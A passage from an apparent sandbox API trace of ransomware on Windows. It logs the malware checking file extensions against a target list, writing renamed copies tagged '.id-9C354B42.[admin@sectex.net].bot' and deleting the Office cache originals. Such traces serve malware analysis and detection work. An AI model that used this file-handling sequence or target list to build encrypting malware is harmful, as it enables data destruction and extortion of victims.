	[0034.350] ReadFile (in: hFile=0x1a8, lpBuffer=0xb1c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa69fed4, lpOverlapped=0x0 | out: lpBuffer=0xb1c0020*, lpNumberOfBytesRead=0xa69fed4*=0x251f, lpOverlapped=0x0) returned 1
	[0034.352] WriteFile (in: hFile=0x17c, lpBuffer=0xb1c0020*, nNumberOfBytesToWrite=0x2520, lpNumberOfBytesWritten=0xa69fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb1c0020*, lpNumberOfBytesWritten=0xa69fc9c*=0x2520, lpOverlapped=0x0) returned 1
	[0034.353] ReadFile (in: hFile=0x1a8, lpBuffer=0xb1c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa69fed4, lpOverlapped=0x0 | out: lpBuffer=0xb1c0020*, lpNumberOfBytesRead=0xa69fed4*=0x0, lpOverlapped=0x0) returned 1
	[0034.353] WriteFile (in: hFile=0x17c, lpBuffer=0xb1c0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa69fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb1c0020*, lpNumberOfBytesWritten=0xa69fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0034.353] SetEndOfFile (hFile=0x17c) returned 1
	[0034.353] CloseHandle (hObject=0x17c) returned 1
	[0034.354] SetFilePointerEx (in: hFile=0x1a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa69fec8 | out: lpNewFilePointer=0x0) returned 1
	[0034.354] SetEndOfFile (hFile=0x1a8) returned 1
	[0034.355] CloseHandle (hObject=0x1a8) returned 1
	[0034.355] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x2020) returned 1
	[0034.355] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0054-0409-1000-0000000ff1ce}-c\\visiomui.xml")) returned 1
	[0034.355] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml") returned 75
	[0034.356] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml") returned 75
	[0034.356] lstrlenW (lpString=".doc") returned 4
	[0034.356] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1
	[0034.356] lstrlenW (lpString=".docx") returned 5
	[0034.356] lstrcmpiW (lpString1=".docx", lpString2="I.xml") returned -1
	[0034.356] lstrlenW (lpString=".pdf") returned 4
	[0034.356] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1
	[0034.356] lstrlenW (lpString=".xls") returned 4
	[0034.356] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1
	[0034.356] lstrlenW (lpString=".xlsx") returned 5
	[0034.356] lstrcmpiW (lpString1=".xlsx", lpString2="I.xml") returned -1
	[0034.356] lstrlenW (lpString=".ppt") returned 4
	[0034.356] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1
	[0034.356] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml") returned 75
	[0034.356] lstrlenW (lpString=".zip") returned 4
	[0034.356] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1
	[0034.356] lstrlenW (lpString=".rar") returned 4
	[0034.356] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1
	[0034.356] lstrlenW (lpString=".bz2") returned 4
	[0034.356] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1
	[0034.356] lstrlenW (lpString=".7z") returned 3
	[0034.356] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1
	[0034.356] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml") returned 75
	[0034.356] lstrlenW (lpString=".dbf") returned 4
	[0034.356] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1
	[0034.356] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml") returned 75
	[0034.356] lstrlenW (lpString=".1cd") returned 4
	[0034.356] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1
	[0034.356] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml") returned 75
	[0034.356] lstrlenW (lpString=".jpg") returned 4
	[0034.356] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1
	[0034.356] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml") returned 75
	[0034.357] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml") returned 75
	[0034.357] lstrlenW (lpString=".doc") returned 4
	[0034.357] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1
	[0034.357] lstrlenW (lpString=".docx") returned 5
	[0034.357] lstrcmpiW (lpString1=".docx", lpString2="I.xml") returned -1
	[0034.357] lstrlenW (lpString=".pdf") returned 4
	[0034.357] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1
	[0034.357] lstrlenW (lpString=".xls") returned 4
	[0034.357] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1
	[0034.357] lstrlenW (lpString=".xlsx") returned 5
	[0034.357] lstrcmpiW (lpString1=".xlsx", lpString2="I.xml") returned -1
	[0034.357] lstrlenW (lpString=".ppt") returned 4
	[0034.357] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1
	[0034.357] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml") returned 75
	[0034.357] lstrlenW (lpString=".zip") returned 4
	[0034.357] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1
	[0034.357] lstrlenW (lpString=".rar") returned 4
	[0034.357] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1
	[0034.357] lstrlenW (lpString=".bz2") returned 4
	[0034.357] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1
	[0034.357] lstrlenW (lpString=".7z") returned 3
	[0034.357] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1
	[0034.357] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml") returned 75
	[0034.357] lstrlenW (lpString=".dbf") returned 4
	[0034.357] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1
	[0034.357] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml") returned 75
	[0034.357] lstrlenW (lpString=".1cd") returned 4
	[0034.357] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1
	[0034.357] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml") returned 75
	[0034.357] lstrlenW (lpString=".jpg") returned 4
	[0034.357] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1
	[0034.358] lstrcmpiW (lpString1=".xml", lpString2=".bot") returned 1
	[0034.358] lstrlenW (lpString="Setup.xml") returned 9
	[0034.358] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a8
	[0034.358] GetFileSizeEx (in: hFile=0x1a8, lpFileSize=0xa69ff1c | out: lpFileSize=0xa69ff1c*=9352) returned 1
	[0034.358] CloseHandle (hObject=0x1a8) returned 1
	[0034.358] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\setup.xml")) returned 0x2020
	[0034.358] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Setup.xml.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\setup.xml.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0034.358] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a8
	[0034.358] SetFilePointerEx (in: hFile=0x1a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa69fec8 | out: lpNewFilePointer=0x0) returned 1
	[0034.359] SetFilePointerEx (in: hFile=0x1a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa69fec8 | out: lpNewFilePointer=0x0) returned 1
	[0034.359] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Setup.xml.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\setup.xml.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c
	[0034.359] GetLastError () returned 0x0
	[0034.359] ReadFile (in: hFile=0x1a8, lpBuffer=0xb1c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa69fed4, lpOverlapped=0x0 | out: lpBuffer=0xb1c0020*, lpNumberOfBytesRead=0xa69fed4*=0x2488, lpOverlapped=0x0) returned 1
	[0034.361] WriteFile (in: hFile=0x17c, lpBuffer=0xb1c0020*, nNumberOfBytesToWrite=0x2490, lpNumberOfBytesWritten=0xa69fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb1c0020*, lpNumberOfBytesWritten=0xa69fc9c*=0x2490, lpOverlapped=0x0) returned 1
	[0034.362] ReadFile (in: hFile=0x1a8, lpBuffer=0xb1c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa69fed4, lpOverlapped=0x0 | out: lpBuffer=0xb1c0020*, lpNumberOfBytesRead=0xa69fed4*=0x0, lpOverlapped=0x0) returned 1
	[0034.362] WriteFile (in: hFile=0x17c, lpBuffer=0xb1c0020*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0xa69fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb1c0020*, lpNumberOfBytesWritten=0xa69fc9c*=0xe6, lpOverlapped=0x0) returned 1
	[0034.362] SetEndOfFile (hFile=0x17c) returned 1
	[0034.362] CloseHandle (hObject=0x17c) returned 1
	[0034.363] SetFilePointerEx (in: hFile=0x1a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa69fec8 | out: lpNewFilePointer=0x0) returned 1
	[0034.363] SetEndOfFile (hFile=0x1a8) returned 1
	[0034.364] CloseHandle (hObject=0x1a8) returned 1
	[0034.364] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Setup.xml.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x2020) returned 1
	[0034.364] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\setup.xml")) returned 1
	[0034.364] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72
	[0034.364] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72
	[0034.364] lstrlenW (lpString=".doc") returned 4
	[0034.364] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1
	[0034.364] lstrlenW (lpString=".docx") returned 5
	[0034.364] lstrcmpiW (lpString1=".docx", lpString2="p.xml") returned -1
	[0034.364] lstrlenW (lpString=".pdf") returned 4
	[0034.364] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1
	[0034.364] lstrlenW (lpString=".xls") returned 4
	[0034.364] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1
	[0034.364] lstrlenW (lpString=".xlsx") returned 5
	[0034.364] lstrcmpiW (lpString1=".xlsx", lpString2="p.xml") returned -1
	[0034.364] lstrlenW (lpString=".ppt") returned 4
	[0034.364] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1
	[0034.364] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72
	[0034.364] lstrlenW (lpString=".zip") returned 4
	[0034.364] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1
	[0034.365] lstrlenW (lpString=".rar") returned 4
	[0034.365] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1
	[0034.365] lstrlenW (lpString=".bz2") returned 4
	[0034.365] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1
	[0034.365] lstrlenW (lpString=".7z") returned 3
	[0034.365] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1
	[0034.365] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72
	[0034.365] lstrlenW (lpString=".dbf") returned 4
	[0034.365] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1
	[0034.365] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72
	[0034.365] lstrlenW (lpString=".1cd") returned 4
	[0034.365] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1
	[0034.365] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72
	[0034.365] lstrlenW (lpString=".jpg") returned 4
	[0034.365] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1
	[0034.365] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72
	[0034.365] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72
	[0034.365] lstrlenW (lpString=".doc") returned 4
	[0034.365] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1
	[0034.365] lstrlenW (lpString=".docx") returned 5
	[0034.365] lstrcmpiW (lpString1=".docx", lpString2="p.xml") returned -1
	[0034.365] lstrlenW (lpString=".pdf") returned 4
	[0034.365] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1
	[0034.365] lstrlenW (lpString=".xls") returned 4
	[0034.365] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1
	[0034.365] lstrlenW (lpString=".xlsx") returned 5
	[0034.365] lstrcmpiW (lpString1=".xlsx", lpString2="p.xml") returned -1
	[0034.365] lstrlenW (lpString=".ppt") returned 4
	[0034.365] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1
	[0034.365] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72
	[0034.365] lstrlenW (lpString=".zip") returned 4
	[0034.365] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1
	[0034.365] lstrlenW (lpString=".rar") returned 4
	[0034.366] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1
	[0034.366] lstrlenW (lpString=".bz2") returned 4
	[0034.366] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1
	[0034.366] lstrlenW (lpString=".7z") returned 3
	[0034.366] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1
	[0034.366] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72
	[0034.366] lstrlenW (lpString=".dbf") returned 4
	[0034.366] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1
	[0034.366] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72
	[0034.366] lstrlenW (lpString=".1cd") returned 4
	[0034.366] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1
	[0034.366] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72
	[0034.366] lstrlenW (lpString=".jpg") returned 4
	[0034.366] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1
	[0034.366] lstrcmpiW (lpString1=".xml", lpString2=".bot") returned 1
	[0034.366] lstrlenW (lpString="AccessMUI.xml") returned 13
	[0034.366] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\access.en-us\\accessmui.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a8
	[0034.373] GetFileSizeEx (in: hFile=0x1a8, lpFileSize=0xa69ff1c | out: lpFileSize=0xa69ff1c*=1349) returned 1
	[0034.373] CloseHandle (hObject=0x1a8) returned 1
	[0034.373] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\access.en-us\\accessmui.xml")) returned 0x2020
	[0034.373] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.xml.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\access.en-us\\accessmui.xml.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0034.373] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\access.en-us\\accessmui.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a8
	[0034.374] SetFilePointerEx (in: hFile=0x1a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa69fec8 | out: lpNewFilePointer=0x0) returned 1
	[0034.374] SetFilePointerEx (in: hFile=0x1a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa69fec8 | out: lpNewFilePointer=0x0) returned 1
	[0034.374] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.xml.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\access.en-us\\accessmui.xml.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c
	[0034.374] GetLastError () returned 0x0
	[0034.374] ReadFile (in: hFile=0x1a8, lpBuffer=0xb1c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa69fed4, lpOverlapped=0x0 | out: lpBuffer=0xb1c0020*, lpNumberOfBytesRead=0xa69fed4*=0x545, lpOverlapped=0x0) returned 1
	[0034.376] WriteFile (in: hFile=0x17c, lpBuffer=0xb1c0020*, nNumberOfBytesToWrite=0x550, lpNumberOfBytesWritten=0xa69fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb1c0020*, lpNumberOfBytesWritten=0xa69fc9c*=0x550, lpOverlapped=0x0) returned 1
	[0034.380] ReadFile (in: hFile=0x1a8, lpBuffer=0xb1c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa69fed4, lpOverlapped=0x0 | out: lpBuffer=0xb1c0020*, lpNumberOfBytesRead=0xa69fed4*=0x0, lpOverlapped=0x0) returned 1
	[0034.381] WriteFile (in: hFile=0x17c, lpBuffer=0xb1c0020*, nNumberOfBytesToWrite=0xee, lpNumberOfBytesWritten=0xa69fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb1c0020*, lpNumberOfBytesWritten=0xa69fc9c*=0xee, lpOverlapped=0x0) returned 1
	[0034.381] SetEndOfFile (hFile=0x17c) returned 1
	[0034.381] CloseHandle (hObject=0x17c) returned 1
	[0034.382] SetFilePointerEx (in: hFile=0x1a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa69fec8 | out: lpNewFilePointer=0x0) returned 1
	[0034.382] SetEndOfFile (hFile=0x1a8) returned 1
	[0034.382] CloseHandle (hObject=0x1a8) returned 1
	[0034.382] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.xml.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x2020) returned 1
	[0034.383] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\access.en-us\\accessmui.xml")) returned 1
	[0034.383] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.xml") returned 89
	[0034.383] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.xml") returned 89
	[0034.383] lstrlenW (lpString=".doc") returned 4
	[0034.383] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1
	[0034.383] lstrlenW (lpString=".docx") returned 5
	[0034.383] lstrcmpiW (lpString1=".docx", lpString2="I.xml") returned -1
	[0034.383] lstrlenW (lpString=".pdf") returned 4
	[0034.383] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1
	[0034.383] lstrlenW (lpString=".xls") returned 4
	[0034.383] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1
	[0034.383] lstrlenW (lpString=".xlsx") returned 5
	[0034.383] lstrcmpiW (lpString1=".xlsx", lpString2="I.xml") returned -1
	[0034.383] lstrlenW (lpString=".ppt") returned 4
	[0034.383] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1
	[0034.383] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.xml") returned 89
	[0034.383] lstrlenW (lpString=".zip") returned 4
	[0034.383] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1
	[0034.383] lstrlenW (lpString=".rar") returned 4
	[0034.383] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1
	[0034.383] lstrlenW (lpString=".bz2") returned 4
	[0034.383] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1
	[0034.383] lstrlenW (lpString=".7z") returned 3
	[0034.383] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1
	[0034.383] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.xml") returned 89
	[0034.383] lstrlenW (lpString=".dbf") returned 4
	[0034.384] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1
	[0034.384] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.xml") returned 89
	[0034.384] lstrlenW (lpString=".1cd") returned 4
	[0034.384] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1
	[0034.384] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.xml") returned 89
	[0034.384] lstrlenW (lpString=".jpg") returned 4
	[0034.384] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1
	[0034.384] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.xml") returned 89
	[0034.384] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.xml") returned 89
	[0034.384] lstrlenW (lpString=".doc") returned 4
	[0034.384] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1
	[0034.384] lstrlenW (lpString=".docx") returned 5
	[0034.384] lstrcmpiW (lpString1=".docx", lpString2="I.xml") returned -1
	[0034.384] lstrlenW (lpString=".pdf") returned 4
	[0034.384] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1
	[0034.384] lstrlenW (lpString=".xls") returned 4
	[0034.384] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1
	[0034.384] lstrlenW (lpString=".xlsx") returned 5
	[0034.384] lstrcmpiW (lpString1=".xlsx", lpString2="I.xml") returned -1
	[0034.384] lstrlenW (lpString=".ppt") returned 4
	[0034.384] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1
	[0034.384] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.xml") returned 89
	[0034.384] lstrlenW (lpString=".zip") returned 4
	[0034.384] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1
	[0034.384] lstrlenW (lpString=".rar") returned 4
	[0034.384] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1
	[0034.384] lstrlenW (lpString=".bz2") returned 4
	[0034.384] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1
	[0034.384] lstrlenW (lpString=".7z") returned 3
	[0034.384] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1
	[0034.384] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.xml") returned 89
	[0034.384] lstrlenW (lpString=".dbf") returned 4
	[0034.384] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1
	[0034.384] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.xml") returned 89
	[0034.385] lstrlenW (lpString=".1cd") returned 4
	[0034.385] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1
	[0034.385] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.xml") returned 89
	[0034.385] lstrlenW (lpString=".jpg") returned 4
	[0034.385] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1
	[0034.385] lstrcmpiW (lpString1=".xml", lpString2=".bot") returned 1
	[0034.385] lstrlenW (lpString="branding.xml") returned 12
	[0034.385] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\access.en-us\\branding.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a8
	[0034.386] GetFileSizeEx (in: hFile=0x1a8, lpFileSize=0xa69ff1c | out: lpFileSize=0xa69ff1c*=596341) returned 1
	[0034.386] CloseHandle (hObject=0x1a8) returned 1
	[0034.386] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\access.en-us\\branding.xml")) returned 0x2020
	[0034.386] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\access.en-us\\branding.xml.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
